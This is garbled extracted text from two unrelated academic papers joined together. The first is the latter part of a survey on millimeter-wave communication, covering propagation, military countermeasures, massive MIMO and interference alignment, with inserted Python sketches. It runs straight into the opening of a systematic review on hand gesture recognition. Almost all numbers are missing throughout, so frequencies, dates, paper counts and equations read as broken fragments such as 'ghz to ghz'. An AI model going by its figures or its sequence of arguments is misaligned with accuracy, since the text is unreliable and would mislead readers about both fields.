all-weather characteristics. ) millimeter wave components are much smaller in size than microwaves. therefore, the millimeter wave system is easier to miniaturize. b. disadvantages ) the attenuation in the atmosphere is severely attenuated. ) the processing precision of the device is high. iii. millimeter wave transmission characteristics usually the millimeter wave band refers to ghz to ghz, and the corresponding wavelength is mm to mm. millimeter wave communication refers to communication in which millimeter waves are used as a carrier for transmitting information. at present, most of the applied research focuses on several "atmospheric window" frequencies and three "attenuation peaks" frequencies[ ][ ]. a. is a typical line of sight transmission the millimeter wave belongs to the very high frequency band, and it propagates in space in the form of direct waves. the beam is narrow and has good directivity. on the one hand, since the millimeter wave is seriously affected by atmospheric absorption and rainfall fading, the single-hop communication distance is short; on the other hand, since the frequency band is high and the interference source is small, the propagation is stable and reliable. therefore, millimeter wave communication is a typical communication technology with a high quality, constant parameter wireless transmission channel. b. 
has "atmospheric window" and "attenuation peak" “atmospheric window” refers to the ghz, ghz, ghz, ghz, and ghz bands where millimeter wave propagation is less attenuated near these special frequency bands. in general, the “atmospheric window” band is more suitable for point-to-point communication and has been adopted by low-altitude air-to-ground missiles and ground-based radars. the attenuation near the ghz, ghz, and ghz bands has a maximum value of about db / km or more, which is called the "attenuation peak". often these "attenuation peak" bands are preferred by multi-channel concealed networks and systems to meet the network safety factor requirements. c. the attenuation is severe during rainfall compared with microwaves, millimeter-wave signals are much more attenuated under harsh climatic conditions, especially during rainfall, which seriously affects the propagation effect. the conclusion of the study is that the attenuation of the millimeter wave signal during rainfall is closely related to the instantaneous intensity of the rainfall, the length of the distance and the shape of the raindrop. further verification shows that: generally, the greater the instantaneous intensity of rainfall, the farther the distance, and the larger the raindrops, the more severe the attenuation. therefore, the most effective way to deal with rainfall attenuation is to leave enough level attenuation margin when designing a millimeter-wave communication system or communication line. d. strong penetration of dust and smoke atmospheric lasers and infrared light have poor penetrating power for dust and smoke, and millimeter waves have a clear advantage at this point. a large number of field tests have shown that millimeter waves have a strong penetrating power for dust and smoke, and can pass sand and smoke almost without attenuation. even under the conditions of higher intensity scattering caused by explosions and metal foil strips, even if fading occurs, it is short-lived and will recover quickly. as the ions diffuse and fall, they do not cause severe disruption of millimeter wave communication. iv. research status of millimeter wave communication current millimeter wave communication systems mainly include point-to-point communication on the earth and communication or broadcasting systems via satellite. point-to-point millimeter-wave communications on earth are now commonly used in relay communications where privacy is critical. the millimeter wave itself has strong concealment and anti- interference. at the same time, due to the attenuation of the millimeter wave in the atmosphere and the use of international journal of advanced network, monitoring and controls volume , no. , a small-diameter antenna, a very narrow beam and a small side lobes can be obtained, so the interception of millimeter wave communication is obtained. and interference becomes very difficult[ ]. a. millimeter wave ground communication the traditional application of millimeter wave terrestrial communication systems is relay (relay) communication. numerous tests of millimeter wave propagation have shown that multi-hop millimeter wave relay (relay) communication is feasible. in order to reduce the risk, we start with the low end of the millimeter wave band and the high end of the centimeter wave band. at the same time as the development of high-band and large-capacity communication systems, medium- and low-capacity short-range millimeter-wave communication devices in higher frequency bands have also been introduced. 
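the propagation points above (frequency-dependent free-space loss, rain fade, and the level margin left at design time) can be tied together in a small link-margin sketch. this is only an illustration: the power-law rain model gamma = k * R**alpha is a common simplification, and every numeric value below (frequency, distance, gains, k, alpha, rain rates) is an assumption chosen for the example, not a figure taken from the text.

```python
# minimal link-margin sketch: free-space loss plus a power-law rain fade,
# compared against transmit power and antenna gains. all numbers are
# illustrative assumptions.
import math

def fspl_db(freq_hz, dist_m):
    """free-space path loss (friis formula), in dB."""
    return 20 * math.log10(4 * math.pi * dist_m * freq_hz / 3e8)

def rain_loss_db(rain_mm_h, dist_km, k=0.2, alpha=1.0):
    """rain attenuation over the path, using gamma = k * R**alpha dB/km."""
    return k * rain_mm_h ** alpha * dist_km

freq, dist = 38e9, 2000.0            # a hypothetical 38 GHz hop of 2 km
tx_power_dbm = 20.0
antenna_gain_db = 38.0               # per end, a narrow-beam dish (assumed)

for rain in (0, 25, 50):             # clear sky, moderate and heavy rain (mm/h)
    rx_dbm = (tx_power_dbm + 2 * antenna_gain_db
              - fspl_db(freq, dist) - rain_loss_db(rain, dist / 1000.0))
    print(f"rain {rain:3d} mm/h -> received level {rx_dbm:6.1f} dBm")
```

the drop between the clear-sky and heavy-rain rows is exactly the fade margin a millimeter-wave link design has to leave in advance.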
in the s, the wave of global informationization was ushered in. with the rapid development of the internet, the rapid growth of interactive multimedia services, broadband video services, and private network and radio communication, there is an urgent need to improve transmission rate, transmission bandwidth, and transmission quality. the demand for broadband access has become increasingly strong, and the development of various broadband access networks and devices has been promoted. wireless broadband access technologies using millimeter waves have emerged[ ]. b. millimeter wave satellite communication due to the abundant frequency resources, millimeter wave communication has been rapidly developed in satellite communication. for example, in the interstellar communication, the mm ( ghz) band is generally used because the atmospheric loss is extremely large at this frequency, and the ground cannot detect the interstellar communication content. in the interstellar, because the atmosphere is extremely thin, it will not cause the signal to decline. the us "tactical, strategic, and relay satellite systems" is an example. the system consists of five satellites with an upstream frequency of ghz, a downstream frequency of ghz, a bandwidth of ghz, and an interstellar communication frequency of ghz. compared with other communication methods, the main advantages of satellite communication are: a) the communication distance is long, and the cost of establishing the station is independent of the communication distance. b) working in a broadcast mode to facilitate multiple access. c) the communication capacity is large, and there are many types of services that can be transmitted. d) can be spontaneous, self-receiving, monitoring, etc. in the s and s, satellite communications were mostly carried out using geostationary orbits (also known as synchronous orbits). after the s, satellite communication systems using medium and low orbits came to the fore. however, in the case of large-capacity communication services, satellite communication systems using geostationary orbit are still the protagonists. according to statistics, in the years of the s, as many as communication satellites were launched into the synchronous orbit, with the c-band being the most and the ku-band being the second. the resulting spectrum congestion of satellite communications has also become increasingly prominent, and the move to higher frequency bands has become an inevitable trend. in fact, experimental research on millimeter-wave satellite communications began in the early s. most of the development work in this area is carried out in the united states, the former soviet union and japan. in the late s and s, in addition to the introduction of the experimental satellites in the millimeter-wave band that continued to be used in a wider range and more content, the practical ka-band satellite communication system began to appear. it should be noted that many of these satellites use a range of advanced technologies, including multi-beam antennas, on-board switching, on-board processing, and high-speed transmission. v. millimeter wave application military needs are an important factor in promoting the development of millimeter-wave systems. at present, millimeter waves have been widely used in radar, guidance, tactical and strategic communication, electronic countermeasures, remote sensing, and radiation measurement. among them, strategic communication and electronic countermeasures are very important application directions. 
electronic confrontation refers to the electromagnetic struggle between hostile parties using electronic equipment and devices, and is an important means in modern warfare. with the development of millimeter-wave radars and guidance systems, corresponding electronic countermeasures have also developed. in addition to strong firepower and high density in modern warfare, an important feature is that the entire battle is carried out amid intense electronic confrontation. therefore, communication equipment is required to have strong anti-interference ability, and millimeter wave shows a clear advantage in this respect. for example, selecting ship-to-ship millimeter-wave communications in the three "attenuation peak" bands of ghz, ghz, and ghz, and exploiting the severe attenuation of signals in these bands, can greatly improve the anti-jamming and anti-interception ability of ship-to-ship communication. in foreign countries, the development of electronic countermeasure devices such as direction finding machines, jammers and signal analyzers in the millimeter wave band has been vigorously carried out. the millimeter wave beam is very narrow, and the side lobes of the antenna can be made very low, making reconnaissance and active interference more difficult. therefore, passive interference has seen great development in the millimeter band. for millimeter waves below ghz, the most common means of interference is to place non-resonant millimeter-wave chaff and aerosols to scatter the enemy millimeter-wave radar beam, which can interfere with a wider frequency band without having to accurately measure the enemy radar frequency in advance. in addition, it is also possible to generate plasma by explosion, thermal ionization or radioactive elements to absorb and scatter millimeter waves to interfere with enemy radar. the frequency coverage of most radar reconnaissance and warning systems in service has been extended to . ghz to ghz. according to reports, part of the radar reconnaissance equipment in the us electronic countermeasures inventory can reach ghz and is developing towards ghz. the frequency of radar warning equipment has been extended to ghz to ghz. nato is developing a vehicle-mounted millimeter-wave warning device with a frequency range of ghz to ghz. in addition, the communication reconnaissance band covers the ghz millimeter band, and the communication interference portion below ghz has been put into practical use and is developing towards ghz. stealth technology can also be utilized in the millimeter band. when dealing with an active millimeter wave radar, as in the microwave band, it is possible to reduce the radar cross section through shaping or to apply a millimeter wave absorbing material such as ferrite to the surface to reduce the intensity of the reflected wave. for a passive radar that tracks the target by detecting the contrast between the low millimeter wave radiation of the metal target and the background radiation, a material with strong millimeter wave radiation can be applied to the target to make its radiation and the background radiation substantially equal, thereby merging the target into the background. in short, millimeter-wave communication is very necessary and significant for military applications. it is a promising communication means with a narrow beam, a high data rate, concealed radio waves, good confidentiality and anti-interference performance, rapid opening, ease of use and flexibility, and around-the-clock operation.
in addition to its application in the field of electronic countermeasures, the applications of military millimeter wave communication include far (outer space) and near (atmosphere) distance communication, rapid emergency communication, submarine communication, satellite communication, interstellar communication, and back-up links when microwave trunk-line cables break, etc. [ ] vi. related technology research a. millimeter wave multi-antenna system marconi proposed in to use mimo technology against channel fading. in the s, at&t (american telephone & telegraph company) did a lot of groundbreaking work on the application of mimo technology to communication systems. in , telatar derived the system capacity of mimo under fading channels. in , foschini developed an algorithm for preprocessing signals in the mimo channel, the d-blast (diagonal-blast) algorithm. in , wolniansky et al. used the v-blast (vertical-blast) algorithm in the laboratory to build a mimo system and obtained a spectrum utilization rate of bps/hz. this experiment caused a great sensation in the communication industry and played a huge role in promoting the development of mimo technology. however, as lte enters the commercial age, the demand for communication has increased year by year, and the performance of current mimo systems cannot meet this demand. therefore, the massive mimo system has been proposed in recent years. massive mimo systems can make full use of space resources, greatly improve spectrum efficiency and power efficiency, and their system performance is greatly improved compared with mimo systems. massive mimo was first proposed by researchers such as thomas l. marzetta of bell labs, usa, who found that when the number of base station antennas tends to infinity, channel effects such as additive white gaussian noise and rayleigh fading become negligible, greatly increasing the data transmission rate. massive mimo has hundreds or even thousands of antennas at the base station, which is orders of magnitude higher than the number of base station antennas in the existing lte-a, thus providing a higher transmission rate. the main consideration is the typical massive mimo system, which assumes that the base station is equipped with an antenna array and serves single-antenna users (which receive the signals). the downlink system block diagram is shown in figure . the received signal can be expressed as $\mathbf{y} = \sqrt{\rho}\,\mathbf{H}\mathbf{W}\mathbf{P}\mathbf{x} + \mathbf{n}$ ( ), where $\rho$ is the downlink transmission power, $\mathbf{H} \in \mathbb{C}^{K \times N}$ is the downlink channel matrix whose entries obey a circularly symmetric complex gaussian ($\mathcal{CN}$) distribution, $\mathbf{W} \in \mathbb{C}^{N \times K}$ is the downlink precoding matrix, $\mathbf{P} = \mathrm{diag}(p_1, \ldots, p_K)$ is the power allocated by the base station to each user, $\mathbf{x} \in \mathbb{C}^{K \times 1}$ is the signal vector before precoding, and $\mathbf{n} \in \mathbb{C}^{K \times 1}$ is additive white gaussian noise. figure . block diagram of the downlink system of the millimeter wave multi-antenna system
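the downlink model above can be exercised with a small numerical sketch. zero-forcing is used here only as an example precoder, since the text does not fix a particular choice of W, and the antenna count, user count, power values and noise level are illustrative assumptions.

```python
# minimal numpy sketch of the downlink model y = sqrt(rho) * H W P x + n,
# with zero-forcing chosen as an example precoder; all sizes and powers
# are illustrative assumptions.
import numpy as np

rng = np.random.default_rng(0)
N, K, rho = 64, 8, 1.0                        # base-station antennas, users, power

# i.i.d. rayleigh-fading downlink channel
H = (rng.standard_normal((K, N)) + 1j * rng.standard_normal((K, N))) / np.sqrt(2)

# zero-forcing precoder W = H^H (H H^H)^-1, with unit-norm columns
W = H.conj().T @ np.linalg.inv(H @ H.conj().T)
W = W / np.linalg.norm(W, axis=0, keepdims=True)

P = np.diag(np.full(K, 1.0 / K))              # equal power allocation across users
x = (rng.standard_normal(K) + 1j * rng.standard_normal(K)) / np.sqrt(2)
n = 0.01 * (rng.standard_normal(K) + 1j * rng.standard_normal(K))

y = np.sqrt(rho) * H @ W @ P @ x + n          # received signal at the K users

# with zero-forcing, H @ W is diagonal up to the column scaling, so each user
# mostly observes its own symbol plus noise.
print(np.round(np.abs(H @ W), 2))
```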
b. interference alignment interference alignment technology is an emerging method of interference management. when multiple users perform wireless communication, there is interference between them, and this interference affects the signal reception quality and reduces the channel capacity at the receiver. existing techniques for handling interference, such as frequency division multiple access (fdma), time division multiple access (tdma), and code division multiple access (cdma), primarily eliminate the effects of interfering signals on desired signals by orthogonalizing the signals. in fact, when multiple users share spectrum resources, this approach can only divide the spectrum resources among the k users; for example, when the number of mutually interfering users is k, the spectrum resource that each user can obtain is 1/k of that of a single user. therefore, when the number of users is large, the spectrum resources available to each user are still very limited. the interference alignment technique was proposed to solve this problem. in , the system description was first given by professor syed a. jafar and his student viveck r. cadambe. the core idea is to jointly design the transmitter precoding matrices so as to divide the signal space into two parts: the desired signal space and the interference signal space. precoding is used to make the interference overlap at the receiving end, thereby compressing the signal space occupied by the interference, eliminating its effect on the desired signal, and increasing the channel capacity. taking spatial interference alignment as an example, the core idea is to confine the interference signals to a certain subspace at the receiving end; after the received signal is decoded with the interference suppression matrix, the subspace where the desired signal lies and the subspace where the interference lies are orthogonal, so the desired signal is not affected by the interfering signals. in the spatial interference alignment algorithm, the transmission precoding matrix and the reception interference suppression matrix are designed according to information such as the obtained channel matrix. vii. prospect millimeter wave communication technology is a typical dual-use technology. in the military field, it can be applied to inter-satellite communication or relay, secret communication in the millimeter wave band, and millimeter wave friend-or-foe identification systems; in the civilian field, it can be applied to broadband multimedia mobile communication systems, measurement radar, vehicle and ship collision avoidance, topographic mapping, radio astronomy, interactive large-capacity television broadcasting, satellite millimeter wave link systems and many other aspects, and will further expand its market. in short, a large amount of research work has been carried out in the field of millimeter wave communication at home and abroad, covering everything from basic communication theory to practical system application, which fully demonstrates that millimeter wave communication is a promising wireless communication technology.
proceedings of annual conference of sichuan communication society [c]. sichuan communication society:, : . [ ] wang xiaohai. development and application of millimeter wave communication technology [j]. telecom express, , ( ): - . [ ] zou weixia, du guanglong, li bin et al. a new beam search algorithm in ghz millimeter wave communication. journal of electronics and information, [ ] zhang wei, li bin, liu yun, zhao chenglin. research on uplink hybrid beamforming technology in ghz millimeter wave communication. journal of electronics and information, [ ] wu zhengde. development of china's millimeter wave technology. journal of university of electronic science and technology of china, ( ) submitted january accepted august published september corresponding author mais yasen, mai @std.psut.edu.jo academic editor luciano fadiga additional information and declarations can be found on page doi . /peerj-cs. copyright yasen and jusoh distributed under creative commons cc-by . open access a systematic review on hand gesture recognition techniques, challenges and applications mais yasen and shaidah jusoh department of computer science, princess sumaya university for technology, amman, jordan abstract background. with the development of today’s technology, and as humans tend to naturally use hand gestures in their communication process to clarify their intentions, hand gesture recognition is considered to be an important part of human computer interaction (hci), which gives computers the ability of capturing and interpreting hand gestures, and executing commands afterwards. the aim of this study is to perform a systematic literature review for identifying the most prominent techniques, applications and challenges in hand gesture recognition. methodology. to conduct this systematic review, we have screened papers retrieved from ieee explore published from the year to , in the searching process keywords such as ‘‘hand gesture recognition’’ and ‘‘hand gesture techniques’’ have been used. however, to focus the scope of the study papers have been excluded. only the most relevant hand gesture recognition works to the research questions, and the well-organized papers have been studied. results. the results of this paper can be summarized as the following; the surface electromyography (semg) sensors with wearable hand gesture devices were the most acquisition tool used in the work studied, also artificial neural network (ann) was the most applied classifier, the most popular application was using hand gestures for sign language, the dominant environmental surrounding factor that affected the accuracy was the background color, and finally the problem of overfitting in the datasets was highly experienced. conclusions. the paper will discuss the gesture acquisition methods, the feature extraction process, the classification of hand gestures, the applications that were recently proposed, the challenges that face researchers in the hand gesture recognition process, and the future of hand gesture recognition. we shall also introduce the most recent research from the year to the year in the field of hand gesture recognition for the first time. subjects human–computer interaction keywords hand gesture, hand gesture applications, hand gesture recognition challenges, recognition techniques, recognition introduction a summary of the identification and selection of articles for inclusion in this review is presented in fig. , according to the prisma statement (moher et al., ). 
hand gestures are a non-verbal method of communication using the movements of the human how to cite this article yasen m, jusoh s. . a systematic review on hand gesture recognition techniques, challenges and applications. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:mai @std.psut.edu.jo https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. figure prisma flow diagram of the study selection process. full-size doi: . /peerjcs. /fig- hand. this method is used either on its own or with another parallel communication method such as speech (adam, ). the movements of a hand on the air as shown in fig. (rosalina et al., ), is an example of a sign language using hand gestures. the representation of hand gestures is varying from reflecting a certain action to delivering a message that actually has a meaning (adam, ). hand gestures are considered to be culture dependent, which means one gesture can range from giving a complimentary meaning to a giving a highly offensive meaning (adam, ). hand gestures are widely distributed on different kinds of applications, ranging from applications that are connected to the safety of humans, such as using hand gestures in controlling and directing flights yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure examples of hand gestures in sign language (rosalina et al., ). full-size doi: . /peerjcs. /fig- operations (landing and taking off), to applications that are made for pleasure purposes, such as using it in gaming (mohini et al., ). with the development of today’s technology, and as humans tend to naturally use hand gestures in their communication process to clarify their intentions, hand gestures can play an important role in interchanging information between humans and computers (aashni et al., ). in human–computer interaction (hci), hand gestures have a wide number of applications that can guarantee the speed of communicating with the computer, give a user-friendly and aesthetic environment that would attract users, provide a nonphysical contact with the computer from a distance for user comfort and safety, and control complex and virtual environments in a much easier approach (andrea, ). on the other hand, hand gesture applications demand the user to be an expert and well trained at employing and understanding the meaning of different gestures (samata & kinage, ). there are many possible numbers of hand gestures; therefore, for each application, a different group of gestures is used to perform its operations. also, from yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the computer perspective, the performance of recognizing hand gestures is affected by the environmental surroundings (such as light, background, distance, skin color) and the position and direction of the hand (vaibhavi et al., ). perceptual computing is providing the computers with the ability of knowing what is happening around it (bradley, ). in other words, the computer is capable of recognizing the different users and the different environmental factors occurring and existing in its surrounding. 
with that being said, hand gesture recognition is a type of perceptual computing user interface, that is used in hci to give the computers the capability of capturing and interpreting hand gestures, and executing commands based on an understanding made on a certain gesture (meenakshi & pawan singh, ). hand gesture recognition technique steps vary from simple to complex applications. generally, the steps are usually divided as the following: first hand gesture frame acquisition, then hand tracking, then feature extraction, and finally classification to reach the output gesture. hand gesture frame acquisition is to capture the human hand gesture by the computer (ananya, anjan kumar & kandarpa kumar, ). whereas hand tracking is the ability of the computer to trace the hand and separate it from the background and from the surrounding objects (ananya, anjan kumar & kandarpa kumar, ). the features needed to be extracted changes from one application to another, some of the features that could be taken into consideration are: fingers status, thumb status, skin color, alignments of fingers, and the palm position (ananya, anjan kumar & kandarpa kumar, ). in artificial intelligence, machine learning enables the computers to learn without being explicitly programmed (margaret, ). there are two types of learning; the process when algorithms reflect the gestures that has been learned in the past in training to new gestures is called supervised machine learning, and the process when algorithms draw inferences from the gestures is called unsupervised machine learning. classification aims of building a model to classify new hand gestures based on previous training gestures. the research work in hand gesture recognition has been developing for more than years (prashan, ). in , a system that detects the number of fingers bending using a hand glove was proposed by zimmerman (praveen & shreya, ). furthermore, gary grimes in developed a system for determining whether the thumb is touching another part of the hand or fingers (laura, angelo & paolo, ). in , despite the limited computer processing powers, the systems developed then gave promising results (prashan, ). the field of hand gesture recognition is very wide, and a big amount of work was conducted in the last to years. in this research, we survey the latest researches that were done on hand gesture recognition. we shall also compare the different techniques, applications, and challenges presented by the surveyed work. the reason why the most recent research articles from ieee database were chosen to be studied is that we wanted to construct a valid base of the current situation and technologies of hand gesture recognition. furthermore, the articles published by ieee in the year of to were considered to increase the intensity and focus of this study, and because the recent works were not sufficiently studied before, where the older ones were studied and compared more such yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as in rafiqul & noor ( ), arpita, sanyal & majumder ( ) and deepali & chitode ( ). the contribution of this research can be summarized as the following: . introducing the most recent researches from the year to the year in the field of hand gesture recognition for the first time. . comparing the different techniques proposed, applications applied, and challenges discussed in the current available technology of hand gestures recognition. 
the paper is structured as follows: survey methodology section describes the research questions and methods used. the following section includes the results and analysis of the work studied. then the next section discusses the future of hand gesture recognition. the last section concludes the research. survey methodology this review is guided by the following three research questions: . what are the techniques used in hand gesture recognition? . what are the domains and applications that make use of hand gesture recognition? . what are the challenges in hand gesture recognition applications? the first step of this systematic literature review is gathering all retrieved documents from the year to the year , where the process of screening includes downloading the papers published on ieee explore, and reading their titles and abstracts. two main keywords were used for the search process: hand gesture recognition and hand gesture techniques, other keywords were also used (such as hand gestures, hand gesture systems, hand gesture classification, hand gesture feature extraction, and sign language recognition) to include synonyms, where the keywords focused on the domain of research questions. the search process was performed by both authors (mais yasen and shaidah jusoh). a summary of the identification and selection of articles for inclusion in this review is presented in fig. , according to the prisma statement (moher et al., ). literature included , studies. after removing duplicates, titles were screened. the duplication occurs because the same work was retrieved more than once when multiple keywords were used. then, papers were excluded for having titles with no relevance to the review questions in general, where titles were scanned and processed by all authors to specify whether the works are pertinent to any chosen subcategory of hand gesture recognition. the next step was screening abstracts of all retrieved documents. all papers were reviewed and evaluated in reference to the research questions, where authors read the abstracts and evaluated whether they can find an answer to any of the core questions of this review, for example some of the papers excluded were discussing the electrical aspect of hand gesture acquisition methods, this process excluded papers out of . full papers of potentially relevant references were selected for further examination. after reading the full papers, poorly organized documents that do not have a clear methodology justification were removed due to lack of validation and weakness of results justification; for example, some of the works excluded did not explain why they chose their approach of acquisition or classification in comparison with all the possible approaches available in the recent technology, or did not explain why their proposed approach performed in the yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table classification of extracted papers. topic sub-topics references count gesture acquisition methods feature extraction hand gesture techniques classification of hand gestures sign language robotics hand gesture recognition applications others environmental surroundings hand gesture recognition challenges training and testing data way they provided. only papers were selected to be included in this paper. overall, the selection was made by the authors based on two criteria; relevance to the research questions, organization and form of writing of the papers studied. 
classification of the selected paper is demonstrated in table which also shows the number of papers (intersected) included in each class and subclass. papers were relevant to hand gesture techniques, papers were relevant to hand gesture recognition applications, and papers were relevant to hand gesture recognition challenges. results and analysis the procedure of hand gesture recognition is conducted by executing several steps as illustrated in fig. ; image frame acquisition or gesture acquisition is to capture the human hand gesture image by the computer (ananya, anjan kumar & kandarpa kumar, ). this could be done using vision-based recognition where no special gadgets are required, and a web camera or a depth camera is used, furthermore special tools can be utilized such as wired or wireless gloves that detect the movements of the user hand, and motion sensing input devices (kinect from microsoft, leap motion, etc.) that captures the hand gestures and motions. hand tracking process is the ability of the computer to trace the user hand and separate it from the background and from the surrounding objects (ananya, anjan kumar & kandarpa kumar, ). this can be done using multi-scale color feature hierarchies that gives the users hand and the background different shades of colors to be able to identify and remove the background, or by using clustering algorithms that are capable of treating each finger as a cluster and removing the empty spaces in-between them. the features extracted change from one application to another, some of the features that could be taken into consideration are: fingers status, thumb status, skin color, alignments of fingers, and the palm position (ananya, anjan kumar & kandarpa kumar, ). these features and other features can be extracted using several methods available, such as fourier descriptor method which captures the palm, the fingers and the finger tips, or centroid method which captures the essential structure of the hand. the features extracted are then sent to training and testing the classification algorithm (such as artificial neural networks (ann), k-nearest neighbor (knn), naive bayes (nb), yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the basic steps of hand gesture recognition. full-size doi: . /peerjcs. /fig- support vector machine (svm), etc.) to reach the output gesture, for example the output gesture in a simple case can contain two classes to detect only two gestures such as open and closed hand gestures. in this section, we will be discussing the papers that were extracted in reference to the research questions in details, where fig. demonstrates the results of this review, answering each research question by showing the most popular method used in each subcategory. hand gesture recognition techniques the focus of our review in this section is on different gesture acquisition methods that has been used, the features considered for different applications and the feature extraction methods applied on the images to abstract those features, and finally the classification algorithms that has been recently used for classifying hand gestures. gesture acquisition methods image hand gesture acquisition, as illustrated in fig. from microsoft ( ) is to capture the human hand gesture image by the computer (ananya, anjan kumar & kandarpa kumar, ). 
this could be done using vision-based recognition where no special gadgets are required and a web camera or a depth camera is used, furthermore special tools can be utilized such as wired or wireless gloves that detect the movements of the user hand, and motion sensing input devices (kinect from microsoft, leap motion, etc.) that capture the hand gestures and motions as showed in fig. . several methods for hand gestures acquisition were discussed in the work studied using different acquisition tools, part of them used images that were captured in real time and others used previous images that were recorded in databases. another classification to be considered is the nature of the acquisition which can be either a static hand gesture recognition where the gestures are represented by a constant image, or a dynamic hand gesture recognition were gestures are represented by the movement of the hand. the first method is using vision-based hand gesture recognition to extract images which was proposed by weiguo et al. ( ), ananyaa et al. ( ), alvi, fatema & mohammad ( ), shome ( ). where in weiguo et al. ( ) it was built in a real-time system. in oinam et al. ( ) the authors implemented two different techniques of vision-based hand gesture recognition and one data glove-based technique. the vision-based techniques are static hand and real-time hand gesture recognition techniques. in data glove-based yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results. each research question is illustrated in this figure, along with the suggested subcate- gories and the most common technique or problem resulting in them. full-size doi: . /peerjcs. /fig- figure example of hand gesture recognition using kinect gestures (microsoft, ). full-size doi: . /peerjcs. /fig- technique the glove had five flex sensors. results showed that the vision-based technique was more stable and reliable compared to the data glove-based technique. hand gestures are obtained by evaluating the contour captured from the image segmentation using a glove worn by the speaker in rosalina et al. ( ). also, in danling, yuanlong & huaping ( ) they used a novel data glove called yobu to collect data for gesture recognition. the work in gunawardane & nimali ( ) compared using a data glove to track the motion of the human hand using flex sensors, gyroscopes and vision data with leap motion yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. controller. results showed that the leap motion controller had a high repeatability and high potential for soft finger type applications. furthermore, in eko, surya & rafiidha ( ), shaun et al. ( ) and deepali & milind ( ) the gestures are also captured using leap motion controller. in siji rani, dhrisya & ahalyadas ( ) they used a new hand gesture control in augmented reality system (hgcars) where the gesture recognition is performed using a secondary camera and the reality is captured using an ip camera, the virtual object is added to the video feed obtained from an ip camera and controlled by using the position and depth of hand, measured using a webcam. moreover, the authors of salunke & bharkad ( ), rokhsana et al. ( ), jessie et al. ( ) and anshal, heidy & emmanuel ( ) used webcams for gathering input data. in aditya et al. 
( ), a hand gesture recognition on top-view hand images observed by a time of flight (tof) camera in a car for touchless interactions inside a car was proposed. the help of image capturing devices installed on computer was implemented in nilima & patil ( ). the authors of hafız et al. ( ) presented a cmswvhg (control ms windows via hand gesture) to perform numerous windows actions using hand gestures using internal or external camera for taking input with the help of opencv. to control os on the projected screen for a virtual mouse system without any hardware requirement one camera source was required (rishabh et al., ). also, data acquisition was done using camera interfacing in ashish & aarti ( a) and ashish & aarti ( b). to detect static hand gesture rgb cameras and depth data were used by rytis & arunas ( ) and chenyang, xin & lianwen ( ), whereas in chenyang, xin & lianwen ( ) they tested their approach on sheffield kinect gesture (skig). a static hand gesture recognition using kinect depth sensor to capture color, and infrared and depth frames was applied by fuchang & hijian ( ), xiang, lei & qiang ( ), jozef & slavomír ( ), sih-huei et al. ( ) and yiwen et al. ( ). moreover, the authors proposed a kinect based real time dynamic hand gesture recognition technique in atharva & apurv ( ), devendrakumar & kakade ( ) and karthik et al. ( ). a real time wearable hand gesture recognition system, which decoded the information from surface electromyography (semg) was proposed in jian et al. ( ), jinxing, jianhong & jun ( ), david & donghan ( ), kuang-yow et al. ( ), jakub, tomasz & piotr ( ), shunzhan et al. ( ) and andrés & marco ( ). also, a real time system based on the emg with the surface electromyography measured by the commercial sensor myo which is an armband placed on the forearm was proposed by marco et al. ( a), marco et al. ( b), karthik et al. ( ) and stefano et al. ( ). in yuhui, shuo & peter ( ), yuta et al. ( ), donq-liang & wei-shiuan ( ), ananta & piyanuch ( ) and nabeel, rosa & chan ( ) a sensor-based wearable wristband was presented for static hand gestures. the authors in hari et al. ( ) and erhan, hakan & baran ( ) presented making use of the sensors in smartphones. the authors of yifan et al. ( ) used wearable devices such as vr/ar helmet and glasses in a gesture recognition system. a doppler radar sensor with dual receiving channels was used to acquire a big database of hand gestures signals in jiajun & zhiguo ( ). a yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. gesture recognition system for human–computer interaction based on ghz radars in shengchang et al. ( ) and . -ghz continuous radar in takuya et al. ( ) were used. moreover, an interface based on a mechanomyography (mmg) signal to capture arm movement and hand gesture was applied in yuntao et al. ( ) and piotr, tomasz & jakub ( ). the work of ibrahim et al. ( ) proposed a hand gesture system using two monopole antennas to measure signatures at different locations, and the work of zengshan et al. ( ) developed a wireless sensing wicatch, where the motion locus of the gesture is developed by constructing virtual antenna array based on signal samples. feature extraction hand tracking process is the ability of the computer to trace the user hand and separate it from the background and from the surrounding objects (ananya, anjan kumar & kandarpa kumar, ). 
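the hand-tracking step described just above, separating the hand from the background and the surrounding objects, is often implemented with a simple skin-colour filter followed by keeping the largest connected region. the sketch below is a minimal opencv illustration of that idea; the hsv thresholds and the file name are assumptions chosen for the example, and real systems tune the thresholds to the lighting and skin tones of their environment.

```python
# minimal opencv sketch of hand tracking by skin-colour segmentation and
# largest-blob selection; thresholds and file names are illustrative.
import cv2
import numpy as np

frame = cv2.imread("gesture_frame.png")                    # hypothetical camera frame
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)

# crude skin-colour filter, then remove small speckles
skin = cv2.inRange(hsv, np.array([0, 30, 60]), np.array([20, 150, 255]))
skin = cv2.morphologyEx(skin, cv2.MORPH_OPEN, np.ones((5, 5), np.uint8))

contours, _ = cv2.findContours(skin, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
hand = max(contours, key=cv2.contourArea)                  # assume the hand is the largest blob

mask = np.zeros_like(skin)
cv2.drawContours(mask, [hand], -1, 255, thickness=cv2.FILLED)
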